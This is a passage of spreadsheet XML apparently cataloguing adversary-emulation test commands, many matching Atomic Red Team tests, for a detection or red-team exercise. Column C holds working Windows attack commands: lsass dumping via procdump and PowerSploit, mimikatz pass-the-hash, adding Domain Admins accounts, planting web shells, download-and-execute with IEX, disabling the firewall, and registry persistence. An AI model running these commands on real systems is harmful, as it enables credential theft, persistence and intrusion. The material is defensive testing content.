        <v>55</v>
      </c>
      <c r="B38" t="s">
        <v>56</v>
      </c>
      <c r="C38" t="str">
        <f>VLOOKUP(B38,[1]Discovery!A:G,7,FALSE)</f>
        <v>net view \\localhost</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A39" t="s">
        <v>55</v>
      </c>
      <c r="B39" t="s">
        <v>57</v>
      </c>
      <c r="C39" t="str">
        <f>VLOOKUP(B39,[1]Discovery!A:G,7,FALSE)</f>
        <v>get-smbshare</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A40" t="s">
        <v>58</v>
      </c>
      <c r="B40" t="s">
        <v>59</v>
      </c>
      <c r="C40" t="str">
        <f>VLOOKUP(B40,[1]Discovery!A:G,7,FALSE)</f>
        <v>Get-Service</v>
      </c>
    </row>
    <row r="41" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A41" t="s">
        <v>60</v>
      </c>
      <c r="B41" t="s">
        <v>61</v>
      </c>
      <c r="C41" t="str">
        <f>VLOOKUP(B41,[1]Discovery!A:G,7,FALSE)</f>
        <v>Get-LocalGroup; Get-LocalGroupMember -Name "Administrators";([ADSI]"WinNT://./Administrators").psbase.Invoke('Members') | % {([ADSI]$_).InvokeGet('AdsPath')}</v>
      </c>
    </row>
    <row r="42" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A42" t="s">
        <v>60</v>
      </c>
      <c r="B42" t="s">
        <v>62</v>
      </c>
      <c r="C42" t="str">
        <f>VLOOKUP(B42,[1]Discovery!A:G,7,FALSE)</f>
        <v>gpresult /R</v>
      </c>
    </row>
    <row r="43" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A43" t="s">
        <v>63</v>
      </c>
      <c r="B43" t="s">
        <v>64</v>
      </c>
      <c r="C43" t="str">
        <f>VLOOKUP(B43,[1]Discovery!A:G,7,FALSE)</f>
        <v>dir</v>
      </c>
    </row>
    <row r="44" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A44" t="s">
        <v>3</v>
      </c>
      <c r="B44" t="s">
        <v>65</v>
      </c>
      <c r="C44" t="str">
        <f>VLOOKUP(B44,[1]Discovery!A:G,7,FALSE)</f>
        <v>net user /domain &amp;&amp; net group /domain</v>
      </c>
    </row>
    <row r="45" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A45" t="s">
        <v>3</v>
      </c>
      <c r="B45" t="s">
        <v>66</v>
      </c>
      <c r="C45" t="str">
        <f>VLOOKUP(B45,[1]Discovery!A:G,7,FALSE)</f>
        <v>net user /domain</v>
      </c>
    </row>
    <row r="46" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A46" t="s">
        <v>67</v>
      </c>
      <c r="B46" t="s">
        <v>68</v>
      </c>
      <c r="C46" t="str">
        <f>VLOOKUP(B46,[1]Discovery!A:G,7,FALSE)</f>
        <v>net user &amp;&amp; dir c:\Users\ &amp;&amp; cmdkey.exe /list &amp;&amp; net localgroup "Users" &amp;&amp; net localgroup</v>
      </c>
    </row>
    <row r="47" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A47" t="s">
        <v>69</v>
      </c>
      <c r="B47" t="s">
        <v>70</v>
      </c>
      <c r="C47" t="str">
        <f>VLOOKUP(B47,[1]Discovery!A:G,7,FALSE)</f>
        <v>$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"; $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"; if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}</v>
      </c>
    </row>
    <row r="48" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A48" t="s">
        <v>69</v>
      </c>
      <c r="B48" t="s">
        <v>71</v>
      </c>
      <c r="C48" t="str">
        <f>VLOOKUP(B48,[1]Discovery!A:G,7,FALSE)</f>
        <v>$error.clear(); Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue; if($error) {echo "Virtualization Environment detected"}</v>
      </c>
    </row>
    <row r="49" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A49" t="s">
        <v>72</v>
      </c>
      <c r="B49" t="s">
        <v>73</v>
      </c>
      <c r="C49" t="str">
        <f>VLOOKUP(B49,[1]Discovery!A:G,7,FALSE)</f>
        <v>Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName</v>
      </c>
    </row>
    <row r="50" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A50" t="s">
        <v>74</v>
      </c>
      <c r="B50" t="s">
        <v>75</v>
      </c>
      <c r="C50" t="str">
        <f>VLOOKUP(B50,[1]Discovery!A:G,7,FALSE)</f>
        <v>wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value</v>
      </c>
    </row>
    <row r="51" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A51" t="s">
        <v>5</v>
      </c>
      <c r="B51" t="s">
        <v>76</v>
      </c>
      <c r="C51" t="str">
        <f>VLOOKUP(B51,[1]Discovery!A:G,7,FALSE)</f>
        <v>Import-Module .\powerview.ps1 -Force;Get-NetDomain | ConvertTo-Json -Depth 1</v>
      </c>
    </row>
    <row r="52" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A52" t="s">
        <v>77</v>
      </c>
      <c r="B52" t="s">
        <v>78</v>
      </c>
      <c r="C52" t="str">
        <f>VLOOKUP(B52,[1]Discovery!A:G,7,FALSE)</f>
        <v>gpresult /z</v>
      </c>
    </row>
    <row r="53" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A53" t="s">
        <v>17</v>
      </c>
      <c r="B53" t="s">
        <v>79</v>
      </c>
      <c r="C53" t="str">
        <f>VLOOKUP(B53,[1]Discovery!A:G,7,FALSE)</f>
        <v>net accounts /domain</v>
      </c>
    </row>
    <row r="54" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A54" t="s">
        <v>17</v>
      </c>
      <c r="B54" t="s">
        <v>80</v>
      </c>
      <c r="C54" t="str">
        <f>VLOOKUP(B54,[1]Discovery!A:G,7,FALSE)</f>
        <v>net accounts</v>
      </c>
    </row>
    <row r="55" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A55" t="s">
        <v>81</v>
      </c>
      <c r="B55" t="s">
        <v>82</v>
      </c>
      <c r="C55" t="str">
        <f>VLOOKUP(B55,[1]Discovery!A:G,7,FALSE)</f>
        <v>powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA</v>
      </c>
    </row>
    <row r="56" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A56" t="s">
        <v>83</v>
      </c>
      <c r="B56" t="s">
        <v>84</v>
      </c>
      <c r="C56" t="str">
        <f>VLOOKUP(B56,[1]Discovery!A:G,7,FALSE)</f>
        <v>SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</v>
      </c>
    </row>
    <row r="57" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A57" t="s">
        <v>85</v>
      </c>
      <c r="B57" t="s">
        <v>86</v>
      </c>
      <c r="C57" t="str">
        <f>VLOOKUP(B57,[1]Discovery!A:G,7,FALSE)</f>
        <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"</v>
      </c>
    </row>
    <row r="58" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A58" t="s">
        <v>87</v>
      </c>
      <c r="B58" t="s">
        <v>88</v>
      </c>
      <c r="C58" t="str">
        <f>VLOOKUP(B58,[1]Discovery!A:G,7,FALSE)</f>
        <v>%LOCALAPPDATA:~-3</v>
      </c>
    </row>
    <row r="59" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A59" t="s">
        <v>89</v>
      </c>
      <c r="B59" t="s">
        <v>90</v>
      </c>
      <c r="C59" t="str">
        <f>VLOOKUP(B59,[1]Discovery!A:G,7,FALSE)</f>
        <v>start 0a4081_DDE_Document.docx</v>
      </c>
    </row>
    <row r="60" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A60" t="s">
        <v>91</v>
      </c>
      <c r="B60" t="s">
        <v>92</v>
      </c>
      <c r="C60" t="str">
        <f>VLOOKUP(B60,[1]Discovery!A:G,7,FALSE)</f>
        <v>$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable; if (-not $RequiredModule) {Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force};  ;  Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop</v>
      </c>
    </row>
    <row r="61" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A61" t="s">
        <v>93</v>
      </c>
      <c r="B61" t="s">
        <v>94</v>
      </c>
      <c r="C61" t="str">
        <f>VLOOKUP(B61,[1]Discovery!A:G,7,FALSE)</f>
        <v>sc.exe create ARTService binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt" &amp;&amp; sc.exe start ARTService &amp;&amp; sc.exe delete ARTService</v>
      </c>
    </row>
    <row r="62" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A62" t="s">
        <v>95</v>
      </c>
      <c r="B62" t="s">
        <v>96</v>
      </c>
      <c r="C62" t="str">
        <f>VLOOKUP(B62,[1]Discovery!A:G,7,FALSE)</f>
        <v>net user /add "T1136.001_Admin" "T1136_pass" &amp;&amp; net localgroup administrators "T1136.001_Admin" /add</v>
      </c>
    </row>
    <row r="63" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A63" t="s">
        <v>97</v>
      </c>
      <c r="B63" t="s">
        <v>98</v>
      </c>
      <c r="C63" t="str">
        <f>VLOOKUP(B63,[1]Discovery!A:G,7,FALSE)</f>
        <v>net user "T1136.002_Admin" "T1136_pass123!" /add /domain &amp;&amp; net group "Domain Admins" "#T1136.002_Admin" /add /domain</v>
      </c>
    </row>
    <row r="64" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A64" t="s">
        <v>99</v>
      </c>
      <c r="B64" t="s">
        <v>100</v>
      </c>
      <c r="C64" t="str">
        <f>VLOOKUP(B64,[1]Discovery!A:G,7,FALSE)</f>
        <v>New-Item -Type Directory PathToAtomicsFolder\T1505.003\src -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\b.jsp";Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\tests.jsp";Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "PathToAtomicsFolder\T1505.003\src\cmd.aspx";xcopy /I /Y PathToAtomicsFolder\T1505.003\src C:\inetpub\wwwroot</v>
      </c>
    </row>
    <row r="65" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A65" t="s">
        <v>101</v>
      </c>
      <c r="B65" t="s">
        <v>102</v>
      </c>
      <c r="C65" t="str">
        <f>VLOOKUP(B65,[1]Discovery!A:G,7,FALSE)</f>
        <v>New-Item -Type Directory (split-path PathToAtomicsFolder\T1543.003\bin\AtomicService.exe) -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe";sc.exe create AtomicTestService_CMD binPath=PathToAtomicsFolder\T1543.003\bin\AtomicService.exe;sc.exe start AtomicTestService_CMD</v>
      </c>
    </row>
    <row r="66" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A66" t="s">
        <v>103</v>
      </c>
      <c r="B66" t="s">
        <v>104</v>
      </c>
      <c r="C66" t="str">
        <f>VLOOKUP(B66,[1]Discovery!A:G,7,FALSE)</f>
        <v>netsh.exe add helper 08497f_NetshHelper.dll &amp;&amp; taskkill /im notepad.exe /t /f &gt; NUL 2&gt;&amp;1</v>
      </c>
    </row>
    <row r="67" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A67" t="s">
        <v>105</v>
      </c>
      <c r="B67" t="s">
        <v>106</v>
      </c>
      <c r="C67" t="str">
        <f>VLOOKUP(B67,[1]Discovery!A:G,7,FALSE)</f>
        <v>$Target = "C:\Windows\System32\calc.exe"; $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"; $WScriptShell = New-Object -ComObject WScript.Shell; $Create = $WScriptShell.CreateShortcut($ShortcutLocation); $Create.TargetPath = $Target; $Create.Save()</v>
      </c>
    </row>
    <row r="68" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A68" t="s">
        <v>107</v>
      </c>
      <c r="B68" t="s">
        <v>108</v>
      </c>
      <c r="C68" t="str">
        <f>VLOOKUP(B68,[1]Discovery!A:G,7,FALSE)</f>
        <v>$url="http://192.168.15.5:8888/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file"</v>
      </c>
    </row>
    <row r="69" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A69" t="s">
        <v>109</v>
      </c>
      <c r="B69" t="s">
        <v>110</v>
      </c>
      <c r="C69" t="str">
        <f>VLOOKUP(B69,[1]Discovery!A:G,7,FALSE)</f>
        <v>New-Item -Type Directory (split-path PathToAtomicsFolder\T1134.002\src\GetToken.ps1) -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/src/GetToken.ps1" -OutFile "PathToAtomicsFolder\T1134.002\src\GetToken.ps1";Set-ExecutionPolicy -Scope Process Bypass -Force; $owners = @{}; gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}; Get-Process | Select ProcessName</v>
      </c>
    </row>
    <row r="70" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A70" t="s">
        <v>111</v>
      </c>
      <c r="B70" t="s">
        <v>112</v>
      </c>
      <c r="C70" t="str">
        <f>VLOOKUP(B70,[1]Discovery!A:G,7,FALSE)</f>
        <v>$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;$processClass = Get-CimClass -ClassName Win32_Process;Invoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{    Commandline = 'cmd.exe /c "timeout /nobreak /t 10 &gt;nul 2&gt;nul &amp; del /f C:\Users\Public\splunkd.exe"';    ProcessStartupInformation = [CimInstance]$startupInfo};</v>
      </c>
    </row>
    <row r="71" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A71" t="s">
        <v>113</v>
      </c>
      <c r="B71" t="s">
        <v>114</v>
      </c>
      <c r="C71" t="str">
        <f>VLOOKUP(B71,[1]Discovery!A:G,7,FALSE)</f>
        <v>reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f</v>
      </c>
    </row>
    <row r="72" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A72" t="s">
        <v>115</v>
      </c>
      <c r="B72" t="s">
        <v>116</v>
      </c>
      <c r="C72" t="str">
        <f>VLOOKUP(B72,[1]Discovery!A:G,7,FALSE)</f>
        <v>certutil -encode C:\Windows\System32\calc.exe %temp%\T1140_calc.txt &amp;&amp; certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe</v>
      </c>
    </row>
    <row r="73" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A73" t="s">
        <v>117</v>
      </c>
      <c r="B73" t="s">
        <v>118</v>
      </c>
      <c r="C73" t="str">
        <f>VLOOKUP(B73,[1]Discovery!A:G,7,FALSE)</f>
        <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username Administrador -Hash cc36cf7a8514893efccd3324464tkg1a -Command hostname</v>
      </c>
    </row>
    <row r="74" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A74" t="s">
        <v>119</v>
      </c>
      <c r="B74" t="s">
        <v>120</v>
      </c>
      <c r="C74" t="str">
        <f>VLOOKUP(B74,[1]Discovery!A:G,7,FALSE)</f>
        <v>netsh advfirewall set currentprofile state off</v>
      </c>
    </row>
    <row r="75" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A75" t="s">
        <v>121</v>
      </c>
      <c r="B75" t="s">
        <v>122</v>
      </c>
      <c r="C75" t="str">
        <f>VLOOKUP(B75,[1]Discovery!A:G,7,FALSE)</f>
        <v>Start-Process powershell.exe -WindowStyle hidden calc.exe</v>
      </c>
    </row>
    <row r="76" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A76" t="s">
        <v>123</v>
      </c>
      <c r="B76" t="s">
        <v>124</v>
      </c>
      <c r="C76" t="str">
        <f>VLOOKUP(B76,[1]Discovery!A:G,7,FALSE)</f>
        <v>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\calcservice" /f /v ImagePath /d "%windir%\system32\cmd.exe" &amp;&amp; sc.exe create calcservice binpath= "%windir%\system32\win32calc.exe"</v>
      </c>
    </row>
    <row r="77" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A77" t="s">
        <v>125</v>
      </c>
      <c r="B77" t="s">
        <v>126</v>
      </c>
      <c r="C77" t="str">
        <f>VLOOKUP(B77,[1]Discovery!A:G,7,FALSE)</f>
        <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump</v>
      </c>
    </row>
    <row r="78" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A78" t="s">
        <v>125</v>
      </c>
      <c r="B78" t="s">
        <v>127</v>
      </c>
      <c r="C78" t="str">
        <f>VLOOKUP(B78,[1]Discovery!A:G,7,FALSE)</f>
        <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip";Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force;New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) -Force | Out-Null;Copy-Item $env:TEMP\Procdump\Procdump.exe PathToAtomicsFolder\T1003.001\bin\procdump.exe -Force;PathToAtomicsFolder\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp</v>
      </c>
    </row>
    <row r="79" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A79" t="s">
        <v>128</v>
      </c>
      <c r="B79" t="s">
        <v>129</v>
      </c>
      <c r="C79" t="str">
        <f>VLOOKUP(B79,[1]Discovery!A:G,7,FALSE)</f>
        <v>$path = "$ENV:UserProfile\Desktop\pcap.etl";New-NetEventSession -Name "PCAP" -CaptureMode SaveToFile -LocalFilePath $path;Add-NetEventProvider -Name "Microsoft-Windows-TCPIP" -SessionName "PCAP";Start-NetEventSession -Name "PCAP";Start-Sleep -s 60;Stop-NetEventSession -Name "PCAP";if (Test-Path $path) {  echo $path;  exit 0;} else {  echo "Failed to generate PCAP file.";  exit 1;};</v>
      </c>
    </row>
    <row r="80" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A80" t="s">
        <v>130</v>
      </c>
      <c r="B80" t="s">
        <v>131</v>
      </c>
      <c r="C80" t="str">
        <f>VLOOKUP(B80,[1]Discovery!A:G,7,FALSE)</f>
        <v>findstr /si pass *.xml *.doc *.txt *.xls; ls -R | select-string -ErrorAction SilentlyContinue -Pattern password</v>
      </c>
    </row>
    <row r="81" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A81" t="s">
        <v>132</v>
      </c>
      <c r="B81" t="s">
        <v>133</v>
      </c>
      <c r="C81" t="str">
        <f>VLOOKUP(B81,[1]Discovery!A:G,7,FALSE)</f>
        <v>foreach($i in @(".key"</v>
      </c>
    </row>
    <row r="82" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A82" t="s">
        <v>128</v>
      </c>
      <c r="B82" t="s">
        <v>134</v>
      </c>
      <c r="C82" t="str">
        <f>VLOOKUP(B82,[1]Discovery!A:G,7,FALSE)</f>
        <v>netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10</v>
      </c>
    </row>
    <row r="83" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A83" t="s">
        <v>135</v>
      </c>
      <c r="B83" t="s">
        <v>136</v>
      </c>
      <c r="C83" t="str">
        <f>VLOOKUP(B83,[1]Discovery!A:G,7,FALSE)</f>
        <v>cmd.exe /c "net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator"</v>
      </c>
    </row>
    <row r="84" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A84" t="s">
        <v>135</v>
      </c>
      <c r="B84" t="s">
        <v>137</v>
      </c>
      <c r="C84" t="str">
        <f>VLOOKUP(B84,[1]Discovery!A:G,7,FALSE)</f>
        <v>cmd.exe /Q /c hostname 1&gt; \\127.0.0.1\ADMIN$\output.txt 2&gt;&amp;1</v>
      </c>
    </row>
    <row r="85" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A85" t="s">
        <v>117</v>
      </c>
      <c r="B85" t="s">
        <v>138</v>
      </c>
      <c r="C85" t="str">
        <f>VLOOKUP(B85,[1]Discovery!A:G,7,FALSE)</f>
        <v>####%tmp%\mimikatz\x64\mimikatz.exe "sekurlsa::pth /user:Administrator /domain:%userdnsdomain% /ntlm:cc36cf7a8514893efccd3324464tkg1a"</v>
      </c>
    </row>
    <row r="86" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A86" t="s">
        <v>139</v>
      </c>
      <c r="B86" t="s">
        <v>140</v>
      </c>
      <c r="C86" t="str">
        <f>VLOOKUP(B86,[1]Discovery!A:G,7,FALSE)</f>
        <v>Write-Host 'Please Enable "C$" share on 127.0.0.1';Out-File -FilePath "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password";copy-item -Path "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password" -Destination "$Env:TEMP\Easter_egg.password"</v>
      </c>
    </row>
    <row r="87" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A87" t="s">
        <v>139</v>
      </c>
      <c r="B87" t="s">
        <v>141</v>
      </c>
      <c r="C87" t="str">
        <f>VLOOKUP(B87,[1]Discovery!A:G,7,FALSE)</f>
        <v>copy \\127.0.0.1\C$\Windows\temp\Easter_Bunny.password %TEMP%\Easter_egg.password</v>
      </c>
    </row>
    <row r="88" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A88" t="s">
        <v>142</v>
      </c>
      <c r="B88" t="s">
        <v>143</v>
      </c>
      <c r="C88" t="str">
        <f>VLOOKUP(B88,[1]Discovery!A:G,7,FALSE)</f>
        <v>New-Item -Path "." -Name "staged" -ItemType "directory" -Force | foreach {$_.FullName} | Select-Object</v>
      </c>
    </row>
    <row r="89" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A89" t="s">
        <v>142</v>
      </c>
      <c r="B89" t="s">
        <v>144</v>
      </c>
      <c r="C89" t="str">
        <f>VLOOKUP(B89,[1]Discovery!A:G,7,FALSE)</f>
        <v>Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile $env:TEMP\discovery.bat</v>
      </c>
    </row>
    <row r="90" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A90" t="s">
        <v>145</v>
      </c>
      <c r="B90" t="s">
        <v>146</v>
      </c>
      <c r="C90" t="str">
        <f>VLOOKUP(B90,[1]Discovery!A:G,7,FALSE)</f>
        <v>if not exist "%programfiles%/WinRAR/Rar.exe"  ( call ) ELSE ( echo Downloading Winrar installer &amp;&amp; bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" %TEMP%\winrar.exe &amp;&amp; %TEMP%\winrar.exe /S ) &amp;&amp; mkdir .\tmp\victim-files &amp;&amp; cd .\tmp\victim-files &amp;&amp; echo "This file will be encrypted" &gt; .\encrypted_file.txt &amp;&amp; "%programfiles%/WinRAR/Rar.exe" a -hp "blue" hello.rar &amp;&amp; dir</v>
      </c>
    </row>
    <row r="91" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A91" t="s">
        <v>145</v>
      </c>
      <c r="B91" t="s">
        <v>147</v>
      </c>
      <c r="C91" t="str">
        <f>VLOOKUP(B91,[1]Discovery!A:G,7,FALSE)</f>
        <v>Compress-Archive -Path C:\Users\Public\staged -DestinationPath C:\Users\Public\staged.zip -Force;sleep 1; ls C:\Users\Public\staged.zip | foreach {$_.FullName} | select</v>
      </c>
    </row>
    <row r="92" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A92" t="s">
        <v>148</v>
      </c>
      <c r="B92" t="s">
        <v>149</v>
      </c>
      <c r="C92" t="str">
        <f>VLOOKUP(B92,[1]Discovery!A:G,7,FALSE)</f>
        <v>invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}'; sleep -s 60; stop-process -name "tor" | out-null</v>
      </c>
    </row>
    <row r="93" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A93" t="s">
        <v>148</v>
      </c>
      <c r="B93" t="s">
        <v>150</v>
      </c>
      <c r="C93" t="str">
        <f>VLOOKUP(B93,[1]Discovery!A:G,7,FALSE)</f>
        <v>cfb85f_Psiphon.bat</v>
      </c>
    </row>
    <row r="94" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A94" t="s">
        <v>151</v>
      </c>
      <c r="B94" t="s">
        <v>152</v>
      </c>
      <c r="C94" t="str">
        <f>VLOOKUP(B94,[1]Discovery!A:G,7,FALSE)</f>
        <v>C:\Windows\System32\Curl.exe -s -A "HttpBrowser/1.0" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "*&lt;|&gt;*" -m3 www.google.com &gt;nul 2&gt;&amp;1</v>
      </c>
    </row>
    <row r="95" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A95" t="s">
        <v>151</v>
      </c>
      <c r="B95" t="s">
        <v>153</v>
      </c>
      <c r="C95" t="str">
        <f>VLOOKUP(B95,[1]Discovery!A:G,7,FALSE)</f>
        <v>Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null; Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null; Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null; Invoke-WebRequest www.google.com -UserAgent "*&lt;|&gt;*" | out-null</v>
      </c>
    </row>
    <row r="96" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A96" t="s">
        <v>154</v>
      </c>
      <c r="B96" t="s">
        <v>155</v>
      </c>
      <c r="C96" t="str">
        <f>VLOOKUP(B96,[1]Discovery!A:G,7,FALSE)</f>
        <v>New-Item -Type Directory (split-path PathToAtomicsFolder\T1071.004\src\T1071-dns-domain-length.ps1) -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/src/T1071-dns-domain-length.ps1" -OutFile "PathToAtomicsFolder\T1071.004\src\T1071-dns-domain-length.ps1";Set-Location PathToAtomicsFolder; .\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT</v>
      </c>
    </row>
    <row r="97" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A97" t="s">
        <v>156</v>
      </c>
      <c r="B97" t="s">
        <v>157</v>
      </c>
      <c r="C97" t="str">
        <f>VLOOKUP(B97,[1]Discovery!A:G,7,FALSE)</f>
